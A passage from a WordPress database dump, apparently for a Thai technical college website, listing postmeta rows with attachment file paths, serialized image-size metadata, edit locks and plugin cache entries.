s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7227, 3077, '_wp_attached_file', '2018/06/17-5-2561-18-05-19.jpg'),
(7228, 3077, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:836;s:6:\"height\";i:326;s:4:\"file\";s:30:\"2018/06/17-5-2561-18-05-19.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"17-5-2561-18-05-19-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"17-5-2561-18-05-19-300x117.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:117;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"17-5-2561-18-05-19-768x299.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:299;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"17-5-2561-18-05-19-400x156.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:156;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7229, 3088, '_edit_lock', '1529390107:3'),
(7230, 3088, '_edit_last', '3'),
(7231, 3089, '_wp_attached_file', '2018/06/6-18-2018-1-07-46-PM.png'),
(7232, 3089, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:826;s:6:\"height\";i:584;s:4:\"file\";s:32:\"2018/06/6-18-2018-1-07-46-PM.png\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"6-18-2018-1-07-46-PM-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"6-18-2018-1-07-46-PM-300x212.png\";s:5:\"width\";i:300;s:6:\"height\";i:212;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:32:\"6-18-2018-1-07-46-PM-768x543.png\";s:5:\"width\";i:768;s:6:\"height\";i:543;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:32:\"6-18-2018-1-07-46-PM-400x283.png\";s:5:\"width\";i:400;s:6:\"height\";i:283;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7233, 3090, '_wp_attached_file', '2018/06/Map-Rayong-Technical-College-eng.jpg'),
(7234, 3090, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:800;s:6:\"height\";i:671;s:4:\"file\";s:44:\"2018/06/Map-Rayong-Technical-College-eng.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:44:\"Map-Rayong-Technical-College-eng-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:44:\"Map-Rayong-Technical-College-eng-300x252.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:252;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:44:\"Map-Rayong-Technical-College-eng-768x644.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:644;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:44:\"Map-Rayong-Technical-College-eng-358x300.jpg\";s:5:\"width\";i:358;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7235, 3088, '_hide_featured', NULL),
(7236, 3111, '_edit_lock', '1529392895:3'),
(7237, 3111, '_edit_last', '3'),
(7238, 3112, '_wp_attached_file', '2018/06/รับสมัครครูอัตราจ้าง-5-อัตรา.pdf'),
(7242, 3111, '_hide_featured', NULL),
(7243, 3111, '_wpas_done_all', '1'),
(7244, 3111, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575646068;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5046;}i:1;a:1:{s:2:\"id\";i:4139;}i:2;a:1:{s:2:\"id\";i:5481;}}}}'),
(7245, 3116, '_wp_attached_file', '2018/01/6-18-2018-2-23-05-PM.png'),
(7246, 3116, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1106;s:6:\"height\";i:714;s:4:\"file\";s:32:\"2018/01/6-18-2018-2-23-05-PM.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"6-18-2018-2-23-05-PM-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"6-18-2018-2-23-05-PM-300x194.png\";s:5:\"width\";i:300;s:6:\"height\";i:194;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:32:\"6-18-2018-2-23-05-PM-768x496.png\";s:5:\"width\";i:768;s:6:\"height\";i:496;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:33:\"6-18-2018-2-23-05-PM-1024x661.png\";s:5:\"width\";i:1024;s:6:\"height\";i:661;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:32:\"6-18-2018-2-23-05-PM-400x258.png\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7247, 3118, '_edit_lock', '1529393883:3'),
(7248, 3118, '_edit_last', '3'),
(7252, 3118, '_hide_featured', NULL),
(7253, 3118, '_wpas_done_all', '1'),
(7254, 3118, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575430591;s:7:\"payload\";a:0:{}}}'),
(7255, 3122, '_wp_attached_file', '2018/06/แผนการจัดการเรียนรู้-วิชางานแม่บ้านโรงแรม.pdf'),
(7256, 3123, '_wp_attached_file', '2018/06/สื่อการเรียน-วิชางานแม่บ้านโรงแรม-รหัสวิชา-2701-2004.pdf'),
(7257, 3125, '_edit_lock', '1529563763:3'),
(7258, 3125, '_edit_last', '3'),
(7259, 3126, '_wp_attached_file', '2018/06/34726512_594491797593679_6397404214603022336_o.jpg'),
(7260, 3126, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1568;s:6:\"height\";i:1044;s:4:\"file\";s:58:\"2018/06/34726512_594491797593679_6397404214603022336_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"34726512_594491797593679_6397404214603022336_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"34726512_594491797593679_6397404214603022336_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"34726512_594491797593679_6397404214603022336_o-768x511.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"34726512_594491797593679_6397404214603022336_o-1024x682.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"34726512_594491797593679_6397404214603022336_o-400x266.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:266;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7261, 3125, '_thumbnail_id', '3126'),
(7265, 3125, '_hide_featured', NULL),
(7266, 3125, '_wpas_done_all', '1'),
(7267, 3129, '_edit_lock', '1529563738:3'),
(7268, 3129, '_edit_last', '3'),
(7269, 3130, '_wp_attached_file', '2018/06/34533755_594498194259706_5491926470387302400_o.jpg'),
(7270, 3130, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1944;s:6:\"height\";i:1296;s:4:\"file\";s:58:\"2018/06/34533755_594498194259706_5491926470387302400_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"34533755_594498194259706_5491926470387302400_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"34533755_594498194259706_5491926470387302400_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"34533755_594498194259706_5491926470387302400_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"34533755_594498194259706_5491926470387302400_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"34533755_594498194259706_5491926470387302400_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7271, 3129, '_thumbnail_id', '3130'),
(7275, 3129, '_hide_featured', NULL),
(7276, 3129, '_wpas_done_all', '1'),
(7277, 3133, '_edit_lock', '1529563890:3'),
(7278, 3133, '_edit_last', '3'),
(7279, 3134, '_wp_attached_file', '2018/06/34725774_594506590925533_2943220566871506944_o.jpg'),
(7280, 3134, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1477;s:6:\"height\";i:1108;s:4:\"file\";s:58:\"2018/06/34725774_594506590925533_2943220566871506944_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"34725774_594506590925533_2943220566871506944_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"34725774_594506590925533_2943220566871506944_o-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"34725774_594506590925533_2943220566871506944_o-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"34725774_594506590925533_2943220566871506944_o-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"34725774_594506590925533_2943220566871506944_o-400x300.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7281, 3133, '_thumbnail_id', '3134'),
(7285, 3133, '_hide_featured', NULL),
(7286, 3133, '_wpas_done_all', '1'),
(7289, 3138, '_edit_lock', '1529571784:3'),
(7290, 3138, '_edit_last', '3'),
(7294, 3138, '_hide_featured', NULL),
(7295, 3138, '_wpas_done_all', '1'),
(7296, 3142, '_wp_attached_file', '2018/06/35142235_596981230678069_5008252112782491648_o.jpg'),
(7297, 3142, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1944;s:6:\"height\";i:1296;s:4:\"file\";s:58:\"2018/06/35142235_596981230678069_5008252112782491648_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"35142235_596981230678069_5008252112782491648_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"35142235_596981230678069_5008252112782491648_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"35142235_596981230678069_5008252112782491648_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"35142235_596981230678069_5008252112782491648_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"35142235_596981230678069_5008252112782491648_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7298, 3138, '_thumbnail_id', '3142'),
(7301, 3143, '_edit_lock', '1529565326:3'),
(7302, 3143, '_edit_last', '3'),
(7303, 3144, '_wp_attached_file', '2018/06/35297253_598240157218843_4215476333343408128_o.jpg'),
(7304, 3144, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1478;s:6:\"height\";i:1108;s:4:\"file\";s:58:\"2018/06/35297253_598240157218843_4215476333343408128_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"35297253_598240157218843_4215476333343408128_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"35297253_598240157218843_4215476333343408128_o-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"35297253_598240157218843_4215476333343408128_o-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"35297253_598240157218843_4215476333343408128_o-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"35297253_598240157218843_4215476333343408128_o-400x300.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7305, 3143, '_thumbnail_id', '3144'),
(7309, 3143, '_hide_featured', NULL),
(7310, 3143, '_wpas_done_all', '1'),
(7311, 3147, '_edit_lock', '1529565390:3'),
(7312, 3147, '_edit_last', '3'),
(7313, 3148, '_wp_attached_file', '2018/06/35328349_598250797217779_1225336852240662528_o.jpg'),
(7314, 3148, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1477;s:6:\"height\";i:1108;s:4:\"file\";s:58:\"2018/06/35328349_598250797217779_1225336852240662528_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"35328349_598250797217779_1225336852240662528_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"35328349_598250797217779_1225336852240662528_o-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"35328349_598250797217779_1225336852240662528_o-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"35328349_598250797217779_1225336852240662528_o-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"35328349_598250797217779_1225336852240662528_o-400x300.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7315, 3147, '_thumbnail_id', '3148'),
(7319, 3147, '_hide_featured', NULL),
(7320, 3147, '_wpas_done_all', '1'),
(7321, 3151, '_edit_lock', '1529565854:3'),
(7322, 3151, '_edit_last', '3'),
(7323, 3152, '_wp_attached_file', '2018/06/35196910_598394787203380_8022261621957066752_o.jpg'),
(7324, 3152, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:4:\"file\";s:58:\"2018/06/35196910_598394787203380_8022261621957066752_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"35196910_598394787203380_8022261621957066752_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"35196910_598394787203380_8022261621957066752_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"35196910_598394787203380_8022261621957066752_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"35196910_598394787203380_8022261621957066752_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"35196910_598394787203380_8022261621957066752_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7325, 3151, '_thumbnail_id', '3152'),
(7329, 3151, '_hide_featured', NULL),
(7330, 3151, '_wpas_done_all', '1'),
(7333, 3155, '_edit_lock', '1529566251:3'),
(7334, 3155, '_edit_last', '3'),
(7335, 3156, '_wp_attached_file', '2018/06/35240484_255186431896938_1400791158250012672_o.jpg'),
(7336, 3156, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2048;s:6:\"height\";i:1152;s:4:\"file\";s:58:\"2018/06/35240484_255186431896938_1400791158250012672_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"35240484_255186431896938_1400791158250012672_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"35240484_255186431896938_1400791158250012672_o-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"35240484_255186431896938_1400791158250012672_o-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"35240484_255186431896938_1400791158250012672_o-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"35240484_255186431896938_1400791158250012672_o-400x225.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7337, 3155, '_thumbnail_id', '3156'),
(7341, 3155, '_hide_featured', NULL),
(7342, 3155, '_wpas_done_all', '1'),
(7345, 3159, '_edit_lock', '1529566571:3'),
(7346, 3159, '_edit_last', '3'),
(7347, 3160, '_wp_attached_file', '2018/06/35296521_599206813788844_7136563829932032000_o.jpg'),
(7348, 3160, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1728;s:6:\"height\";i:1152;s:4:\"file\";s:58:\"2018/06/35296521_599206813788844_7136563829932032000_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"35296521_599206813788844_7136563829932032000_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"35296521_599206813788844_7136563829932032000_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"35296521_599206813788844_7136563829932032000_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"35296521_599206813788844_7136563829932032000_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"35296521_599206813788844_7136563829932032000_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7349, 3159, '_thumbnail_id', '3160'),
(7353, 3159, '_hide_featured', NULL),
(7354, 3159, '_wpas_done_all', '1'),
(7355, 3163, '_edit_lock', '1529566712:3'),
(7356, 3163, '_edit_last', '3'),
(7357, 3164, '_wp_attached_file', '2018/06/35240050_602410910135101_4953681177442516992_o.jpg'),
(7358, 3164, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1477;s:6:\"height\";i:1108;s:4:\"file\";s:58:\"2018/06/35240050_602410910135101_4953681177442516992_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"35240050_602410910135101_4953681177442516992_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"35240050_602410910135101_4953681177442516992_o-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"35240050_602410910135101_4953681177442516992_o-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"35240050_602410910135101_4953681177442516992_o-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"35240050_602410910135101_4953681177442516992_o-400x300.jpg\";s:5:\"width\";i:400;s:6:\"height